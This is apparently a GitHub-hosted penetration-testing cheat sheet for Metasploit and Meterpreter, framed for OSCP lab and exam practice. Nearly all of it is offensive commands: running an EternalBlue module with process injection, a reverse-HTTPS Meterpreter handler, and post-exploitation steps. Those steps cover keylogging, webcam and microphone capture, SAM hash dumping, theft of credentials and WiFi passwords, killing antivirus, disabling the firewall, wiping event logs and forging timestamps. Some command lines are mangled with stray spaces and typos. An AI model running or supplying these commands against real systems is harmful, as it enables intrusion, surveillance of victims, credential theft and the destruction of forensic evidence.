forked from OlivierLaflamme/Cheatsheet-God
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Cheatsheet_Metasploit&Meterpreter.txt
395 lines (312 loc) · 14.6 KB
/
Cheatsheet_Metasploit&Meterpreter.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
See [*Metasploit Unleashed Course*](https://www.offensive-security.com/metasploit-unleashed/)
Search for exploits using Metasploit GitHub framework source code:
[*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
`systemctl start postgresql`
To enable Postgresql on startup
`systemctl enable postgresql`
MSF Syntax
Start metasploit
`msfconsole `
`msfconsole -q`
Show help for command
`show -h`
Show Auxiliary modules
`show auxiliary`
Use a module
`use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass`
Show the basic information for a module
`info`
Show the configuration parameters for a module
`show options`
Set options for a module
`set RHOSTS 192.168.1.1-254
set THREADS 10`
Run the module
`run`
Execute an Exploit
`exploit`
Search for a module
`search type:auxiliary login`
Metasploit Database Access
Show all hosts discovered in the MSF database
`hosts`
Scan for hosts and store them in the MSF database
`db_nmap`
Search machines for specific ports in MSF database
`services -p 443`
Leverage MSF database to scan SMB ports (auto-completed rhosts)
`services -p 443 --rhosts`
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
`dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit`
2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
`use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run`
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
`sysinfo`
Get user id from Meterpreter Shell
`getuid`
Search for a file
`search -f *pass*.txt`
Upload a file
`upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
Download a file
`download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`
Invoke a command shell from Meterpreter Shell
`shell`
Exit the meterpreter shell
`exit`
Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse\_https\_meterpreter
`payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/`
Building Your Own MSF Module
`mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rb`
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
- `download` Download a file or directory
`upload` Upload a file or directory
`portfwd` Forward a local port to a remote service
`route` View and modify the routing table
`keyscan_start` Start capturing keystrokes
`keyscan_stop` Stop capturing keystrokes
`screenshot` Grab a screenshot of the interactive desktop
`record_mic` Record audio from the default microphone for X seconds
`webcam_snap` Take a snapshot from the specified webcam
`getsystem` Attempt to elevate your privilege to that of local system.
`hashdump` Dumps the contents of the SAM database
---------------------------------------------------------------------------------------------------------------
####Materpreter Study Notes
# Baisc system commands
background # placed in the background of the current session
Sessions # Sessions to see -h help
sessions -i <ID value> # kill -k session into the session
bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts
info # View existing module information
getuid # View current user identity
getprivs # View current user permissions
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open ruby terminal
ps # View is running Process
kill <PID value> # Kill the specified PID process
idletime # View target idle time
reboot / shutdown # Restart / Shutdown
shell # Enter target cmd shell
# Common cmd commands
Whoami # Current privilege
quser # Query current online administrator
net user # View existing user
net user username/password/add # Add user and corresponding password
net localgroup User group name username/add # Add the specified user to the specified user group
netstat -ano # Query the current network connection communication in the computer, LISTENING indicates that the port is in the listening state; ESTABLISHED indicates that the port is in the working (communication) state
systeminfo # View the details of the current computer
tasklist /svc # View each process corresponding to services
taskkill / f / im program name # name of the end of a specified program
taskkill / f / PID ID # end of a specified process PID
tasklist | findstr "string" # Find content specified output
logoff # cancellation of a Specify the user's ID
shutdown -r # Restart the current computer
netsh adcfirewall setAllprofiles state off # Turn off the firewall
# Uictl switch keyboard / mouse
Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse
uictl disable mouse # disable mouse
uictl disable keyboard # disable keyboard
# Execute executable file
the Execute # executable file on the target machine
execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive
execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"
# -d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory
"-o hack.txt" is the running parameter of payload.exe
# Migrate process migration
Getpid # Get the current process's pid
ps # View the current active process
migrate <pid value> # Migrate the Meterpreter session to the specified pid value in the process
kill <pid value> #kill the process
# Clearav clear log
Clearav # Clear application logs, system logs, security logs in windows
# Timestomp forged timestamp
Timestomp C: \\ -h
View help timestomp -v C: \\ 2 .txt
View timestamp timestomp C: \\ 2 .txt -f C: \\ 1 .txt #Copy the timestamp of 1.txt Give
2. txt timestomp c: \\ test \\ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time
# Portfwd port forwarding
Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111
rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password
# Autoroute add route
run autoroute -h # View help
run get_local_subnets # View target intranet segment address
run autoroute -s 192 .168.183.0/24 # Add target network segment route
run autoroute -p # View added route
run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389
# Socks agent
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127 .0.0.1
set srvport 2000
run
# Common script
Run arp_scanner -r 192 .168.183.1/24 # Use arp for surviving host scan
run winenum # automate some detection scripts
run credcollect # get user hash
run domain_list_gen # get domain management account list
run post/multi/gather/env # get User environment variable
run post/windows/gather/enum_logged_on_users -c # List current login user
run post/linux/gather/checkvm # virtual machine
run post/windows/gather/checkvm # virtual machine
run post/windows/gather/ Forensics/enum_drives # View memory information
run post/windows/gather/enum_applications # Get installation software information
run post/windows/gather/dumplinks # Get recently accessed documents, link information
run post/windows/gather/enum_ie # Get IE cache
run post/windows/gather/enum_firefox # Get firefox cache
run post/windows/gather/enum_chrome # Get Chrome cache
run post/multi/recon/local_exploit_suggester # Get local privilege vulnerability
run post/windows/gather/enum_patches # Get patch information
run post/windows/gather/enum_domain # Find domain control
run post/windows/gather/enum_snmp # Get snmp community name
run post/windows/gather/credentials/vnc # Get vnc password
run post/windows/wlan/ Wlan_profile # Used to read the target host WiFi password
run post/multi/gather/wlan_geolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot
run post/windows/manage/killav close antivirus software
# Common crack module
Auxiliary/scanner/mssql/mssql_login
Auxiliary/scanner/ftp/ftp_login
Auxiliary/scanner/ssh/ssh_login
Auxiliary/scanner/telnet/telnet_login
Auxiliary/scanner/smb/smb_login
Auxiliary/scanner/mssql/mssql_login
Auxiliary/scanner/mysql/mysql_login
Auxiliary/scanner/oracle/oracle_login
Auxiliary/scanner/postgres/postgres_login
Auxiliary/scanner/vnc/vnc_login
Auxiliary/scanner/pcanywhere/pcanywhere_login
Auxiliary/scanner/snmp/snmp_login
Auxiliary/scanner/ftp/anonymous
# Keylogger
Keyscan_start # Start key record
keyscan_dump # Export record data
keyscan_stop # End key record
# Sniffer capture package
Use sniffer
Sniffer_interfaces # View NIC
sniffer_start 1 # Select NIC 1 to start capturing
sniffer_stats 1 # View NIC 1 status
sniffer_dump 1 /tmp/wlan1.pcap # Export pcap packet
sniffer_stop 1 # Stop NIC 1 capture
sniffer_release 1 # Release NIC 1 traffic
# Webcam
record_mic # audio recording
webcam_chat # open a video chat (the other party pop)
webcam_list # view camera
webcam_snap # through the camera to take pictures
webcam_stream # open by video surveillance cameras (to monitor ≈ live as a web page)
# Screen capture
Screenshot # Screenshots
use espia # Use espia module
screengrab # screenshot
# Getgui command
run getgui –h # View help
run getgui -e # Open remote desktop
run getgui -u admin -p admin # Add user
run getgui -f 6666 -e # 3389 port forward to 6666
---------------------------------------------------------------------------------------------------------------
CORE COMMANDS
? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel
FILE SYSTEM COMMANDS
cat - read and output to stdout the contents of a file
cd - change directory on the victim
del - delete a file on the victim
download - download a file from the victim system to the attacker system
edit - edit a file with vim
getlwd - print the local directory
getwd - print working directory
lcd - change local directory
lpwd - print local directory
ls - list files in current directory
mkdir - make a directory on the victim system
pwd - print working directory
rm - delete a file
rmdir - remove directory on the victim system
upload - upload a file from the attacker system to the victim
NETWORK COMMANDS
ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table
SYSTEM COMMANDS
clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name
User Interface Commands
enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components
PRIVILAGE ESCALATION COMMANDS
getsystem - uses 15 built-in methods to gain sysadmin privileges
PASSWORD DUMP COMMAND
hashdump - grabs the hashes in the password (SAM) file
TIMESTOMP COMMAND
timestomp - manipulates the modify, access, and create attributes of a file